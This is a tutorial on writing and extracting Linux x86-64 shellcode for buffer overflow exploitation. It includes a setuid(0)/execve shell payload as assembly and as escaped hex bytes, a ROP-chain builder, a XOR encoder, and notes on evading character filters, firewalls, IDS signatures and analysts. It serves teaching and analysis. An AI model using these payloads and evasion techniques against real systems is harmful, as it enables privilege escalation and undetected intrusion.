Shellcode, sometimes loosely called bytecode, is machine code (binary, conventionally written out in hexadecimal) that can be used in buffer overflow exploitation and is usually presented to humans as assembly. A programmer can write any application directly in machine code by way of assembly, which is as powerful as any other programming language, though unlike most languages it is usually (but not always) tied to a single operating system and instruction set architecture.
|Writing shellcode requires a basic understanding of bitwise math, Linux assembly, and stack overflows|
Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow exploit, keep in mind the many potential obstructions from security infrastructure (such as DEP, ASLR, firewalls, or IDS and IPS appliances): filter bypass and IDS evasion techniques are often needed for successful exploitation past modern countermeasures.
This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested in OllyDbg or IDA Pro. Throughout the articles in this category are small snippets of code taken from the examples found in the appendix; the shellcode and associated object files in this article are also contained in shellcodecs.
Types of shellcode
Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.
Executable vs. Return-oriented
There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by whether the target environment can execute code on its data stack. If properly targeted, return-oriented shellcode should work regardless of whether the stack is executable, while executable shellcode works exclusively on executable stacks.
- Executable shellcode is typically translated from assembly written for its target operating system. Most basic executable shellcodes, such as traditional null-free shellcodes, can be used on any vulnerable application with an executable stack, provided no input filters are in place.
- Return-oriented shellcode uses return-oriented programming when the vulnerable buffer is non-executable. This is usually done by constructing a call stack formatted like one generated by an ordinary compiled application, which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.
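Because a return-oriented payload is only a sequence of addresses and data words, it can be assembled like any other byte string. The following is a minimal sketch for a 64-bit little-endian target; the padding length, gadget addresses, and argument value are placeholders invented for illustration and do not come from any real binary.

```python
import struct

def build_chain(padding_len, words):
    """Return filler bytes followed by each 64-bit word in little-endian order."""
    filler = b"A" * padding_len  # bytes up to the saved return address (assumed offset)
    return filler + b"".join(struct.pack("<Q", w) for w in words)

# Hypothetical addresses: a `pop %rdi; ret` gadget, its argument, and a target function.
POP_RDI_RET = 0x0000000000401263
ARGUMENT = 0x0000000000404040
TARGET_FUNC = 0x0000000000401050

chain = build_chain(24, [POP_RDI_RET, ARGUMENT, TARGET_FUNC])
print(len(chain))   # 48
print(chain.hex())
```

Note that 64-bit addresses such as these contain null bytes, so a chain like this would be truncated by any copy routine that stops at the first null.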
|Certain instruction set architectures, such as MIPS, keep a function's return address in a register rather than on the stack, which makes traditional stack overflows and return-oriented programming harder to apply. Non-leaf functions still save that register to the stack, so these architectures are not immune.|
Countermeasures and environmental hostility
While traditional binary shellcodes will normally work unencumbered against unsanitized, unpatched, or larger inputs, many target environments and applications have limiting factors that obstruct the execution of traditional machine code. Most applications written in C or C++ require that the machine code be null-free, because their string routines stop copying at the first null byte. This is why null-free shellcode is the traditional basic form of executable shellcode programming.
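A quick way to see the null-free requirement is to scan a candidate encoding for forbidden bytes. The helper below is a sketch, and `find_bad_bytes` is a name chosen here for illustration. It compares two encodings that load 0x3b into the accumulator: the plain `mov` carries three null bytes in its immediate, while the `push`/`pop` pair does not.

```python
def find_bad_bytes(payload, bad=b"\x00"):
    """Return (offset, byte) pairs for every byte of payload that appears in bad."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

with_nulls = bytes.fromhex("b83b000000")  # mov $0x3b,%eax
null_free = bytes.fromhex("6a3b58")       # push $0x3b ; pop %rax

print(find_bad_bytes(with_nulls))  # [(2, 0), (3, 0), (4, 0)]
print(find_bad_bytes(null_free))   # []
```

The `bad` parameter can be widened to cover other filtered characters, such as newlines or spaces.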
- Character filters can be evaded by using polymorphic (self-modifying) code to reconstruct, at runtime, bytecode that falls outside the allowed character set. Most character filters restrict input to the printable keyspace, so ASCII shellcode and alphanumeric shellcode have become prevalent means of circumventing them.
- Character encoding can be bypassed by encoding the payload so that it decodes to the proper machine code. The code often has to survive Unicode, base64, case conversion, or other transformations before being copied into the vulnerable buffer.
- Buffer size may be severely limited and can require second-order injection when the payload is too large to fit into the vulnerable buffer. As a result, shellcode size is traditionally kept to a minimum for optimal reusability.
- Firewalls can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic. Bypassing firewalls has been accomplished by utilizing file-descriptor re-use.
- Analysts may be debugging the vulnerable application in an attempt to reverse engineer the exploitation process. int3 breakpoint detection and one-way hashing have been demonstrated to evade volatile forensic analysis tools (such as Volatility).
- Signatures are a particular obstacle for Linux shellcode because syscalls are its traditional interface to the operating system and are therefore the most static part of any given shellcode. Even polymorphic and self-modifying shellcodes usually unpack into shellcodes containing syscalls. Syscalls can be removed using self-linking code.
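The character-filter and encoding items above share one idea: transform the payload so the bytes in transit avoid the forbidden set, then restore it at runtime. A single-byte XOR is used below only as the simplest possible illustration, not as the method of any particular encoder. A real encoder would also prepend a machine-code decoder stub that is itself free of the forbidden bytes, which this sketch omits.

```python
def find_xor_key(payload, bad=b"\x00"):
    """Return (key, encoded) for the first single-byte key that avoids bad bytes."""
    for key in range(1, 256):
        if key in bad:
            continue
        encoded = bytes(b ^ key for b in payload)
        if not any(b in bad for b in encoded):
            return key, encoded
    return None  # no single-byte key works for this payload

def xor_decode(encoded, key):
    """Reverse the encoding; at runtime this is the decoder stub's job."""
    return bytes(b ^ key for b in encoded)

raw = bytes.fromhex("b83b0000000f05")  # mov $0x3b,%eax ; syscall (contains nulls)
key, encoded = find_xor_key(raw)
print(key, encoded.hex())              # 1 b93a0101010e04
print(xor_decode(encoded, key) == raw) # True
```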
Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.
Assembling the code
Create a text file named test_shellcode.s.
This example will use hatter's null-free 32-byte payload for setuid(0); execve("/bin/bash", NULL, NULL). The listing builds the path /bin/bash on the stack. Copy the following code into test_shellcode.s, then save it:
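    # 32 bytes
    .text
    .globl _start
    _start:
    xor %rdi,%rdi                     # rdi = 0 (uid argument)
    pushq $0x69
    pop %rax                          # rax = 105 (setuid)
    syscall
    push %rdi
    push %rdi
    pop %rsi                          # rsi = 0 (argv = NULL)
    pop %rdx                          # rdx = 0 (envp = NULL)
    pushq $0x68                       # "h" followed by the null terminator
    movabs $0x7361622f6e69622f,%rax   # "/bin/bas"
    push %rax
    push %rsp
    pop %rdi                          # rdi = pointer to "/bin/bash"
    pushq $0x3b
    pop %rax                          # rax = 59 (execve)
    syscall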
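The immediates in this listing are easier to read once converted to the bytes they occupy in memory. The short sketch below does that conversion for the two pushed values; `imm_to_bytes` is a helper name introduced here for illustration. x86-64 is little-endian, and the value pushed last ends up at the lowest address, which is where %rsp points.

```python
def imm_to_bytes(value, width=8):
    """Return the bytes an immediate occupies in memory on little-endian x86-64."""
    return value.to_bytes(width, "little")

tail = imm_to_bytes(0x68)                # pushed first, so it sits at the higher address
head = imm_to_bytes(0x7361622f6e69622f)  # pushed second, so %rsp points here

path = (head + tail).split(b"\x00", 1)[0]
print(head)  # b'/bin/bas'
print(path)  # b'/bin/bash'

# Values loaded into %rax before each `syscall` instruction.
print(0x69, 0x3b)  # 105 59
```

Pushing 0x68 as a full 8-byte word is what supplies the terminating nulls without any null byte appearing in the instruction encoding.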
When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:
|localhost:~ $ as test_shellcode.s -o test_shellcode.o|
Extracting the shellcode
|localhost:~ $ objdump -d test_shellcode.o|
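The middle column contains the instruction bytes corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation alongside the disassembly of the debugged application. Note that the output below comes from a 34-byte variant of the payload that builds /bin/sh with movabs and shr, so its bytes differ from the 32-byte source listed above: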
    localhost:~ $ objdump -d test_shellcode.o
    test_shellcode.o: file format elf64-x86-64
       0: 48 31 ff                xor %rdi,%rdi
       3: 6a 69                   pushq $0x69
       5: 58                      pop %rax
       6: 0f 05                   syscall
       8: 57                      push %rdi
       9: 57                      push %rdi
       a: 5e                      pop %rsi
       b: 5a                      pop %rdx
       c: 48 bf 6a 2f 62 69 6e    movabs $0x68732f6e69622f6a,%rdi
      13: 2f 73 68
      16: 48 c1 ef 08             shr $0x8,%rdi
      1a: 57                      push %rdi
      1b: 54                      push %rsp
      1c: 5f                      pop %rdi
      1d: 6a 3b                   pushq $0x3b
      1f: 58                      pop %rax
      20: 0f 05                   syscall
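Copying the middle column by hand is error-prone, so the byte column can be collected with a few lines of script. The parser below is a sketch that assumes the usual `objdump -d` line shape (offset and colon, then space-separated hex bytes, then an optional mnemonic); `bytes_from_objdump` and the sample text are illustrative and cover only the first few lines of the listing.

```python
import re

# Offset and colon, whitespace, then one or more two-digit hex bytes.
LINE = re.compile(r"\s*[0-9a-f]+:\s+((?:[0-9a-f]{2}(?:\s|$))+)")

def bytes_from_objdump(text):
    """Collect the hex byte column from `objdump -d` style lines."""
    out = bytearray()
    for line in text.splitlines():
        m = LINE.match(line)
        if m:  # header lines and blank lines do not match
            out += bytes.fromhex(m.group(1))
    return bytes(out)

sample = (
    "test_shellcode.o:     file format elf64-x86-64\n"
    "   0:\t48 31 ff             \txor    %rdi,%rdi\n"
    "   3:\t6a 69                \tpushq  $0x69\n"
    "   c:\t48 bf 6a 2f 62 69 6e \tmovabs $0x68732f6e69622f6a,%rdi\n"
    "  13:\t2f 73 68 \n"
)

code = bytes_from_objdump(sample)
escaped = "".join(f"\\x{b:02x}" for b in code)
print(escaped)
```

The escaped string is in the form expected by `echo -en` or a C string literal.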
You will often come across shellcode in the wild, for example when analyzing malware or a newly published exploit, and want to disassemble it to learn what it does. The easiest way to do this is with objdump. This example uses the 34-byte payload from the disassembly above (claimed to be the shortest 64-bit setuid() shell online):
    localhost:~ $ echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
    shellcode: file format binary
    Disassembly of section .data:
    00000000 <.data>:
       0: 48 31 ff                xor %rdi,%rdi
       3: 6a 69                   pushq $0x69
       5: 58                      pop %rax
       6: 0f 05                   syscall
       8: 57                      push %rdi
       9: 57                      push %rdi
       a: 5e                      pop %rsi
       b: 5a                      pop %rdx
       c: 48 bf 6a 2f 62 69 6e    movabs $0x68732f6e69622f6a,%rdi
      13: 2f 73 68
      16: 48 c1 ef 08             shr $0x8,%rdi
      1a: 57                      push %rdi
      1b: 54                      push %rsp
      1c: 5f                      pop %rdi
      1d: 6a 3b                   pushq $0x3b
      1f: 58                      pop %rax
      20: 0f 05                   syscall
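When reading a disassembly like this, the `movabs`/`shr` pair is the part that most needs decoding. The sketch below reproduces the arithmetic: the immediate carries a throwaway leading byte so that the instruction contains no null, and the 8-bit right shift discards that byte while shifting a zero in at the top, which becomes the string terminator in memory.

```python
payload = bytes.fromhex(
    "4831ff6a69580f0557575e5a48bf6a2f62696e2f7368"
    "48c1ef0857545f6a3b580f05"
)
print(len(payload), 0 in payload)     # 34 False

imm = 0x68732f6e69622f6a              # operand of movabs
print(imm.to_bytes(8, "little"))      # b'j/bin/sh'

shifted = imm >> 8                    # effect of shr $0x8,%rdi
print(shifted.to_bytes(8, "little"))  # b'/bin/sh\x00'
```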